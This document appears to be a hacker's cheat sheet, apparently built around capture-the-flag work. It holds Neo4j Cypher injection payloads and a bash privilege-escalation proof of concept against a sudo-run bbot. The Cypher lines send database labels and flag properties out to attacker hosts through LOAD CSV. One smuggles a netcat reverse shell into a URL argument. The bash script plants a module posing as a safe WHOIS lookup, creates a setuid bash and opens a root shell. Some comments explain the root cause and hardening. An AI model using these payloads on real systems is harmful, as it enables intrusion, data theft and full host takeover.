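CYPHER INJECTION (user input concatenated into the Cypher query string; passing it as a query parameter instead closes this off):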
https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits
NEO4J - :V
Dump labels (each label is sent to an external HTTP listener through LOAD CSV):
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0 //
' OR 1=1 WITH 1 as dummy CALL custom.getUrlStatusCode('example.com; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.17 4444 > /tmp/f') YIELD statusCode RETURN statusCode as hash //"
#!/bin/bash
# Local privilege-escalation proof of concept for a host where the current
# user can run /usr/local/bin/bbot through sudo. The sudoers rule is not shown
# here; presumably it leaves bbot's arguments unrestricted -- confirm.
#
# Root cause: bbot is handed a caller-supplied preset (-p) whose module_dirs
# entry points at a user-writable directory, and a module from that directory
# is selected with -m, so the module's setup() runs with the privileges that
# sudo grants.
#
# Hardening: do not grant sudo on tools that take code or plugin paths from
# caller-controlled configuration; if the rule must exist, pin the complete
# argument list in sudoers. Mounting /tmp with nosuid and alerting on new
# setuid files under world-writable paths covers the artifact created below.

# Stop at the first failing command, so a refused sudo ends the script before
# the setuid check in step 5 is reached.
set -e
# Step 1: Create config file
# The preset only sets module_dirs, adding /tmp/modules as a module location.
echo "Creating malicious BBOT config..."
cat << EOF > /tmp/myconf.yml
module_dirs:
- /tmp/modules
EOF
# Step 2: Create modules directory
echo "Creating modules directory..."
mkdir -p /tmp/modules
# Step 3: Create malicious module
# The quoted 'EOF' delimiter writes the module text verbatim, with no shell
# expansion. The module presents itself as a passive/safe DNS_NAME consumer,
# but its setup() shells out to copy /bin/bash to /tmp/bash and set the
# setuid bit on the copy; handle_event() does nothing.
echo "Creating malicious whois2 module..."
cat << 'EOF' > /tmp/modules/whois2.py
from bbot.modules.base import BaseModule
import os
class whois2(BaseModule):
watched_events = ["DNS_NAME"]
produced_events = ["WHOIS"]
flags = ["passive", "safe"]
meta = {"description": "Query WhoisXMLAPI for WHOIS data"}
options = {"api_key": ""}
options_desc = {"api_key": "WhoisXMLAPI Key"}
per_domain_only = True
async def setup(self):
os.system("cp /bin/bash /tmp/bash && chmod u+s /tmp/bash")
self.api_key = self.config.get("api_key")
return True
async def handle_event(self, event):
pass
EOF
# Step 4: Execute BBOT to create SUID bash
# This is the only privileged step: sudo runs bbot with the preset from step 1
# (-p) and the module from step 3 (-m), so setup() executes as the sudo
# target user and the copied binary is owned by that user.
echo "Executing malicious BBOT module..."
sudo /usr/local/bin/bbot -p /tmp/myconf.yml -m whois2
# Step 5: Check if SUID bash was created
# [ -u FILE ] is true only when FILE exists with the setuid bit set. bash -p
# starts in privileged mode, which keeps the effective UID instead of
# resetting it to the real UID.
if [ -u /tmp/bash ]; then
echo -e "\\n[+] SUID bash created successfully!"
echo -e "[*] Spawning root shell...\\n"
/tmp/bash -p
else
echo -e "\\n[-] Exploit failed - SUID bash not created"
exit 1
fi
# Cleanup (optional)
# NOTE: left disabled, so the setuid /tmp/bash, the preset and the module file
# remain on disk afterwards; these are the paths to check during triage.
# rm /tmp/bash /tmp/myconf.yml /tmp/modules/whois2.py
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //